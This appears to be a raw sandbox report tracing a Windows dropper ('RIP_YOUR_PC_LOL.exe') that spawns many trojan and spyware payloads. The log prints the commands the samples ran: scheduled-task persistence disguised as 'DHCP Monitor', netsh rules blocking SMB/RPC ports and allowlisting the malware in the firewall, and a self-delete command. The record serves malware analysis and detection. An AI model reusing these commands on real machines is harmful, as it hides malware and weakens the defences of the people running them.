                    Source: 8f1c8b40c7be588389a8d382040b23bb.exe.4.dr | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                    Source: a.exe.4.dr | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESERVED size: 0x100000 address: 0x0
                    Source: Opus.exe.4.dr | Static PE information: Section: .rsrc ZLIB complexity 0.995233050847
                    Source: a.exe.4.dr | Static PE information: Section: ZLIB complexity 1.00057768486
                    Source: a.exe.4.dr | Static PE information: Section: ZLIB complexity 1.021484375
                    Source: RIP_YOUR_PC_LOL.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                    Source: C:\Users\user\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exe | Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
                    Source: C:\Users\user\Desktop\RIP_YOUR_PC_LOL.exe | File created: C:\Users\user\AppData\Roaming\healastounding.exe
                    Source: classification engine | Classification label: mal100.troj.adwa.spyw.evad.winEXE@84/32@48/5
                    Source: C:\Users\user\Desktop\RIP_YOUR_PC_LOL.exe | File read: C:\Users\user\Desktop\desktop.ini
                    Source: Opus.exe.4.dr, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs | Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                    Source: Opus.exe.4.dr, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs | Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
                    Source: 5.0.Pluto Panel.exe.f10000.4.unpack, Form1.cs | Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                    Source: Pluto Panel.exe.0.dr, Form1.cs | Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                    Source: 5.2.Pluto Panel.exe.f10000.0.unpack, Form1.cs | Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                    Source: 5.0.Pluto Panel.exe.f10000.8.unpack, Form1.cs | Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                    Source: 5.0.Pluto Panel.exe.f10000.12.unpack, Form1.cs | Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                    Source: test.exe.4.dr, Client/Helper/Methods.cs | Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                    Source: test.exe.4.dr, Client/Helper/Methods.cs | Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
                    Source: C:\Users\user\AppData\Roaming\Opus.exe | File created: C:\Program Files (x86)\DHCP Monitor
                    Source: RIP_YOUR_PC_LOL.exe | Virustotal: Detection: 63%
                    Source: RIP_YOUR_PC_LOL.exe | Metadefender: Detection: 33%
                    Source: RIP_YOUR_PC_LOL.exe | ReversingLabs: Detection: 73%
                    Source: C:\Users\user\Desktop\RIP_YOUR_PC_LOL.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: unknown | Process created: C:\Users\user\Desktop\RIP_YOUR_PC_LOL.exe "C:\Users\user\Desktop\RIP_YOUR_PC_LOL.exe"
                    Source: C:\Users\user\Desktop\RIP_YOUR_PC_LOL.exe | Process created: C:\Users\user\AppData\Roaming\healastounding.exe "C:\Users\user\AppData\Roaming\healastounding.exe"
                    Source: C:\Users\user\Desktop\RIP_YOUR_PC_LOL.exe | Process created: C:\Users\user\AppData\Roaming\Pluto Panel.exe "C:\Users\user\AppData\Roaming\Pluto Panel.exe"
                    Source: C:\Users\user\AppData\Roaming\healastounding.exe | Process created: C:\Users\user\AppData\Roaming\test.exe "C:\Users\user\AppData\Roaming\test.exe"
                    Source: C:\Users\user\Desktop\RIP_YOUR_PC_LOL.exe | Process created: C:\Users\user\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe "C:\Users\user\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe"
                    Source: C:\Users\user\AppData\Roaming\healastounding.exe | Process created: C:\Users\user\AppData\Roaming\gay.exe "C:\Users\user\AppData\Roaming\gay.exe"
                    Source: C:\Users\user\AppData\Roaming\healastounding.exe | Process created: C:\Users\user\AppData\Roaming\Opus.exe "C:\Users\user\AppData\Roaming\Opus.exe"
                    Source: C:\Users\user\Desktop\RIP_YOUR_PC_LOL.exe | Process created: C:\Users\user\AppData\Roaming\22.exe "C:\Users\user\AppData\Roaming\22.exe"
                    Source: C:\Users\user\AppData\Roaming\healastounding.exe | Process created: C:\Users\user\AppData\Roaming\aaa.exe "C:\Users\user\AppData\Roaming\aaa.exe"
                    Source: C:\Users\user\AppData\Roaming\healastounding.exe | Process created: C:\Users\user\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exe "C:\Users\user\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exe"
                    Source: C:\Users\user\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe | Process created: C:\Users\user\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe "C:\Users\user\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe"
                    Source: C:\Users\user\AppData\Roaming\healastounding.exe | Process created: C:\Users\user\AppData\Roaming\4.exe "C:\Users\user\AppData\Roaming\4.exe"
                    Source: C:\Users\user\AppData\Roaming\gay.exe | Process created: C:\Users\user\AppData\Roaming\mediaget.exe "C:\Users\user\AppData\Roaming\mediaget.exe"
                    Source: C:\Users\user\AppData\Roaming\aaa.exe | Process created: C:\Users\user\AppData\Roaming\aaa.exe C:\Users\user\AppData\Roaming\aaa.exe
                    Source: C:\Users\user\AppData\Roaming\Opus.exe | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe" /create /f /tn "DHCP Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmp4896.tmp
                    Source: C:\Users\user\AppData\Roaming\healastounding.exe | Process created: C:\Users\user\AppData\Roaming\a.exe "C:\Users\user\AppData\Roaming\a.exe"
                    Source: C:\Users\user\AppData\Roaming\22.exe | Process created: C:\Windows\SysWOW64\netsh.exe netsh ipsec static add policy name=Block
                    Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\SysWOW64\netsh.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\RIP_YOUR_PC_LOL.exe | Process created: C:\Users\user\AppData\Roaming\___11.19.exe "C:\Users\user\AppData\Roaming\___11.19.exe"
                    Source: C:\Users\user\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exe | Process created: C:\Users\user\AppData\Local\Temp\FFDvbcrdfqs.exe "C:\Users\user\AppData\Local\Temp\FFDvbcrdfqs.exe"
                    Source: C:\Users\user\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exe | Process created: C:\Users\user\AppData\Local\Temp\Dcvxaamev.exe "C:\Users\user\AppData\Local\Temp\Dcvxaamev.exe"
                    Source: C:\Users\user\AppData\Roaming\22.exe | Process created: C:\Windows\SysWOW64\netsh.exe netsh ipsec static add filterlist name=Filter1
                    Source: unknown | Process created: C:\Users\user\AppData\Roaming\Opus.exe C:\Users\user\AppData\Roaming\Opus.exe 0
                    Source: C:\Users\user\AppData\Roaming\Opus.exe | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe" /create /f /tn "DHCP Monitor Task" /xml "C:\Users\user\AppData\Local\Temp\tmp5D87.tmp
                    Source: C:\Windows\SysWOW64\netsh.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Roaming\mediaget.exe | Process created: C:\Windows\SysWOW64\netsh.exe netsh firewall add allowedprogram "C:\Users\user\AppData\Roaming\mediaget.exe" "mediaget.exe" ENABLE
                    Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Roaming\22.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=135 protocol=TCP
                    Source: C:\Windows\SysWOW64\netsh.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\SysWOW64\netsh.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: unknownProcess created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe "C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe"
                    Source: C:\Users\user\AppData\Roaming\4.exeProcess created: C:\Users\user\AppData\Roaming\3.exe "C:\Users\user\AppData\Roaming\3.exe"
                    Source: unknownProcess created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe "C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe" 0
                    Source: C:\Users\user\AppData\Roaming\22.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=135 protocol=UDP
                    Source: C:\Windows\SysWOW64\netsh.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Roaming\___11.19.exeProcess created: C:\Users\user\AppData\Local\Temp\svchost.exe C:\Users\user\AppData\Local\Temp\\svchost.exe
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\mediaget.exe "C:\Users\user\AppData\Roaming\mediaget.exe" ..
                    Source: C:\Users\user\AppData\Roaming\22.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=139 protocol=TCP
                    Source: C:\Windows\SysWOW64\netsh.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Roaming\___11.19.exeProcess created: C:\Users\user\AppData\Local\Temp\svchos.exe C:\Users\user\AppData\Local\Temp\\svchos.exe
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\mediaget.exe "C:\Users\user\AppData\Roaming\mediaget.exe" ..
                    Source: C:\Users\user\AppData\Roaming\22.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=139 protocol=UDP
                    Source: C:\Windows\SysWOW64\netsh.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: unknownProcess created: C:\Windows\SysWOW64\TXPlatforn.exe C:\Windows\SysWOW64\TXPlatforn.exe -auto
                    Source: unknownProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe -k " "
                    Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ping -n 2 127.0.0.1 > nul && del C:\Users\user\AppData\Local\Temp\svchost.exe > nul
                    Source: C:\Windows\SysWOW64\TXPlatforn.exeProcess created: C:\Windows\SysWOW64\TXPlatforn.exe C:\Windows\SysWOW64\TXPlatforn.exe -acsi
                    Source: C:\Users\user\AppData\Roaming\___11.19.exeProcess created: C:\Users\user\AppData\Roaming\HD____11.19.exe C:\Users\user\AppData\Roaming\HD____11.19.exe
                    Source: unknownProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe -k " "
                    Source: C:\Users\user\AppData\Roaming\22.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=445 protocol=TCP
                    Source: C:\Windows\SysWOW64\netsh.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\mediaget.exe "C:\Users\user\AppData\Roaming\mediaget.exe" ..
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\RIP_YOUR_PC_LOL.exeProcess created: C:\Users\user\AppData\Roaming\healastounding.exe "C:\Users\user\AppData\Roaming\healastounding.exe"
                    Source: C:\Users\user\Desktop\RIP_YOUR_PC_LOL.exeProcess created: C:\Users\user\AppData\Roaming\Pluto Panel.exe "C:\Users\user\AppData\Roaming\Pluto Panel.exe"
                    Source: C:\Users\user\Desktop\RIP_YOUR_PC_LOL.exeProcess created: C:\Users\user\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe "C:\Users\user\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe"
                    Source: C:\Users\user\Desktop\RIP_YOUR_PC_LOL.exeProcess created: C:\Users\user\AppData\Roaming\22.exe "C:\Users\user\AppData\Roaming\22.exe"
                    Source: C:\Users\user\Desktop\RIP_YOUR_PC_LOL.exeProcess created: C:\Users\user\AppData\Roaming\___11.19.exe "C:\Users\user\AppData\Roaming\___11.19.exe"
                    Source: C:\Users\user\AppData\Roaming\healastounding.exeProcess created: C:\Users\user\AppData\Roaming\test.exe "C:\Users\user\AppData\Roaming\test.exe"
                    Source: C:\Users\user\AppData\Roaming\healastounding.exeProcess created: C:\Users\user\AppData\Roaming\gay.exe "C:\Users\user\AppData\Roaming\gay.exe"
                    Source: C:\Users\user\AppData\Roaming\healastounding.exeProcess created: C:\Users\user\AppData\Roaming\Opus.exe "C:\Users\user\AppData\Roaming\Opus.exe"
                    Source: C:\Users\user\AppData\Roaming\healastounding.exeProcess created: C:\Users\user\AppData\Roaming\aaa.exe "C:\Users\user\AppData\Roaming\aaa.exe"
                    Source: C:\Users\user\AppData\Roaming\healastounding.exeProcess created: C:\Users\user\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exe "C:\Users\user\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exe"
                    Source: C:\Users\user\AppData\Roaming\healastounding.exeProcess created: C:\Users\user\AppData\Roaming\4.exe "C:\Users\user\AppData\Roaming\4.exe"
                    Source: C:\Users\user\AppData\Roaming\healastounding.exeProcess created: C:\Users\user\AppData\Roaming\a.exe "C:\Users\user\AppData\Roaming\a.exe"
                    Source: C:\Users\user\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exeProcess created: C:\Users\user\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe "C:\Users\user\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe"
                    Source: C:\Users\user\AppData\Roaming\gay.exeProcess created: C:\Users\user\AppData\Roaming\mediaget.exe "C:\Users\user\AppData\Roaming\mediaget.exe"
                    Source: C:\Users\user\AppData\Roaming\Opus.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe" /create /f /tn "DHCP Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmp4896.tmp
                    Source: C:\Users\user\AppData\Roaming\Opus.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe" /create /f /tn "DHCP Monitor Task" /xml "C:\Users\user\AppData\Local\Temp\tmp5D87.tmp
                    Source: C:\Users\user\AppData\Roaming\22.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh ipsec static add policy name=Block
                    Source: C:\Users\user\AppData\Roaming\22.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh ipsec static add filterlist name=Filter1
                    Source: C:\Users\user\AppData\Roaming\22.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=135 protocol=TCP
                    Source: C:\Users\user\AppData\Roaming\22.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=135 protocol=UDP
                    Source: C:\Users\user\AppData\Roaming\22.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=139 protocol=TCP
                    Source: C:\Users\user\AppData\Roaming\22.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=139 protocol=UDP
                    Source: C:\Users\user\AppData\Roaming\22.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=445 protocol=TCP
                    Source: C:\Users\user\AppData\Roaming\22.exeProcess created: unknown unknown
                    Source: C:\Users\user\AppData\Roaming\aaa.exeProcess created: C:\Users\user\AppData\Roaming\aaa.exe C:\Users\user\AppData\Roaming\aaa.exe
                    Source: C:\Users\user\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exeProcess created: C:\Users\user\AppData\Local\Temp\FFDvbcrdfqs.exe "C:\Users\user\AppData\Local\Temp\FFDvbcrdfqs.exe"
                    Source: C:\Users\user\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exeProcess created: C:\Users\user\AppData\Local\Temp\Dcvxaamev.exe "C:\Users\user\AppData\Local\Temp\Dcvxaamev.exe"
                    Source: C:\Users\user\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exeProcess created: unknown unknown
                    Source: C:\Users\user\AppData\Roaming\4.exeProcess created: C:\Users\user\AppData\Roaming\3.exe "C:\Users\user\AppData\Roaming\3.exe"
                    Source: C:\Users\user\AppData\Roaming\mediaget.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh firewall add allowedprogram "C:\Users\user\AppData\Roaming\mediaget.exe" "mediaget.exe" ENABLE
                    Source: C:\Users\user\Desktop\RIP_YOUR_PC_LOL.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
                    Source: C:\Users\user\AppData\Roaming\Opus.exeFile created: C:\Users\user\AppData\Local\Temp\tmp4896.tmp
                    Source: RIP_YOUR_PC_LOL.exe, 00000000.00000000.366341482.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, RIP_YOUR_PC_LOL.exe, 00000000.00000003.437188672.00000000056F5000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, Pluto Panel.exe, 00000005.00000002.711210574.0000000004691000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 00000005.00000000.393171200.0000000000F12000.00000002.00000001.01000000.00000006.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                    Source: RIP_YOUR_PC_LOL.exe, 00000000.00000000.366341482.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, RIP_YOUR_PC_LOL.exe, 00000000.00000003.437188672.00000000056F5000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, Pluto Panel.exe, 00000005.00000002.711210574.0000000004691000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 00000005.00000000.393171200.0000000000F12000.00000002.00000001.01000000.00000006.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                    Source: RIP_YOUR_PC_LOL.exe, 00000000.00000000.366341482.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, RIP_YOUR_PC_LOL.exe, 00000000.00000003.437188672.00000000056F5000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 00000005.00000002.711210574.0000000004691000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 00000005.00000000.393171200.0000000000F12000.00000002.00000001.01000000.00000006.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
                    Source: RIP_YOUR_PC_LOL.exe, 00000000.00000000.366341482.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, RIP_YOUR_PC_LOL.exe, 00000000.00000003.437188672.00000000056F5000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, Pluto Panel.exe, 00000005.00000002.711210574.0000000004691000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 00000005.00000000.393171200.0000000000F12000.00000002.00000001.01000000.00000006.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
                    Source: RIP_YOUR_PC_LOL.exe, 00000000.00000000.366341482.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, RIP_YOUR_PC_LOL.exe, 00000000.00000003.437188672.00000000056F5000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, Pluto Panel.exe, 00000005.00000002.711210574.0000000004691000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 00000005.00000000.393171200.0000000000F12000.00000002.00000001.01000000.00000006.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                    Source: RIP_YOUR_PC_LOL.exe, 00000000.00000000.366341482.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, RIP_YOUR_PC_LOL.exe, 00000000.00000003.437188672.00000000056F5000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, Pluto Panel.exe, 00000005.00000002.711210574.0000000004691000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 00000005.00000000.393171200.0000000000F12000.00000002.00000001.01000000.00000006.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                    Source: RIP_YOUR_PC_LOL.exe, 00000000.00000000.366341482.00000000009F2000.00000002.00000001.01000000.00000003.sdmp, RIP_YOUR_PC_LOL.exe, 00000000.00000003.437188672.00000000056F5000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, Pluto Panel.exe, 00000005.00000002.711210574.0000000004691000.00000004.00000800.00020000.00000000.sdmp, Pluto Panel.exe, 00000005.00000000.393171200.0000000000F12000.00000002.00000001.01000000.00000006.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                    Source: C:\Users\user\Desktop\RIP_YOUR_PC_LOL.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
                    Source: C:\Users\user\AppData\Roaming\healastounding.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
                    Source: C:\Users\user\AppData\Roaming\Pluto Panel.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
                    Source: C:\Users\user\AppData\Roaming\test.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                    Source: C:\Users\user\AppData\Roaming\gay.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
                    Source: C:\Users\user\AppData\Roaming\gay.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
                    Source: C:\Users\user\AppData\Roaming\gay.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
                    Source: C:\Users\user\AppData\Roaming\Opus.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
                    Source: C:\Users\user\AppData\Roaming\Opus.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
                    Source: C:\Users\user\AppData\Roaming\Opus.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
                    Source: C:\Users\user\AppData\Roaming\aaa.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
                    Source: C:\Users\user\AppData\Roaming\mediaget.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
                    Source: C:\Users\user\AppData\Roaming\mediaget.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
                    Source: C:\Users\user\AppData\Roaming\mediaget.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
                    Source: Pluto Panel.exe.0.dr, Form1.csBase64 encoded string: 'jKnnv2OtHmCVbL4ukcqXfe1z4H4de/YNg8JCpqpr9q1DDxgSWA+kEDbvzq/lfM8KFapQuuMTsxM2O5Tzlzm+pg==', 'PN4TW3peZ3UeXi7asDB56E4dMEf6JrdkxXNUlrUjLlWcjHK1wZ5CpLZZKB/ocuFWy9Kw0Q8tIc1Qv7OEgqzD+w=='
                    Source: test.exe.4.dr, Client/Settings.csBase64 encoded string: 'v6koimo+vF3BpFPktw8BetB7AEEQsjTP+2fUrZBifNQL3VLBnsc6kqaCQyc26UwN+wJnzl3S0KePTZMjcmvKrQ==', 'hTlHatPbydXHCRGS9wyzSyGV3lDBjQwrOqcw8Vu2ZOiS6WdPzcixmQ4HQ74RFBC6IMp/8uc3fwBetM+DvU0ymg==', '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', 'PNacpggE943C4yIAxkJJwCUgYrYxQZpenLl1Bqh8BnvgpkUJXkpgRwU5h3mt3Cs4MAyKzMVHoAd0U+v8e9UB1A==', 'Sg/SHVSZ/qR5y5EwqyWIRqfVY6rjte36C54KgrTe3F7ZT2bUzQddbjrFaSGUdi+PF9Qsi/pnRMxLVP5LZxs8og==', 'sgQCpAYNGXYv9lrcYNb6mSAEdN16LkgynbAWXkrPD7KnesLckmg3bIeh1bBoqD4eudmpegWPTJfkJgwn/f88lg==', 'GnRcTByJoC136DtixgIf1zT5HUVC8VfztoP4k7zA7bYXSoona8laBJOFq51jtcEvabtT740ceMv5a1woOTDVtA=='
                    Source: 5.0.Pluto Panel.exe.f10000.8.unpack, Form1.csBase64 encoded string: 'jKnnv2OtHmCVbL4ukcqXfe1z4H4de/YNg8JCpqpr9q1DDxgSWA+kEDbvzq/lfM8KFapQuuMTsxM2O5Tzlzm+pg==', 'PN4TW3peZ3UeXi7asDB56E4dMEf6JrdkxXNUlrUjLlWcjHK1wZ5CpLZZKB/ocuFWy9Kw0Q8tIc1Qv7OEgqzD+w=='
                    Source: 5.2.Pluto Panel.exe.f10000.0.unpack, Form1.csBase64 encoded string: 'jKnnv2OtHmCVbL4ukcqXfe1z4H4de/YNg8JCpqpr9q1DDxgSWA+kEDbvzq/lfM8KFapQuuMTsxM2O5Tzlzm+pg==', 'PN4TW3peZ3UeXi7asDB56E4dMEf6JrdkxXNUlrUjLlWcjHK1wZ5CpLZZKB/ocuFWy9Kw0Q8tIc1Qv7OEgqzD+w=='
                    Source: 5.0.Pluto Panel.exe.f10000.4.unpack, Form1.csBase64 encoded string: 'jKnnv2OtHmCVbL4ukcqXfe1z4H4de/YNg8JCpqpr9q1DDxgSWA+kEDbvzq/lfM8KFapQuuMTsxM2O5Tzlzm+pg==', 'PN4TW3peZ3UeXi7asDB56E4dMEf6JrdkxXNUlrUjLlWcjHK1wZ5CpLZZKB/ocuFWy9Kw0Q8tIc1Qv7OEgqzD+w=='
                    Source: 5.0.Pluto Panel.exe.f10000.12.unpack, Form1.csBase64 encoded string: 'jKnnv2OtHmCVbL4ukcqXfe1z4H4de/YNg8JCpqpr9q1DDxgSWA+kEDbvzq/lfM8KFapQuuMTsxM2O5Tzlzm+pg==', 'PN4TW3peZ3UeXi7asDB56E4dMEf6JrdkxXNUlrUjLlWcjHK1wZ5CpLZZKB/ocuFWy9Kw0Q8tIc1Qv7OEgqzD+w=='
                    Source: C:\Users\user\AppData\Roaming\Opus.exeMutant created: \Sessions\1\BaseNamedObjects\Global\{c5a0b6d8-d1f7-45cd-943b-d5fda411e988}
                    Source: C:\Users\user\AppData\Roaming\test.exeMutant created: \Sessions\1\BaseNamedObjects\AsyncMutex_6SI8OkPnk
                    Source: C:\Users\user\AppData\Roaming\Opus.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
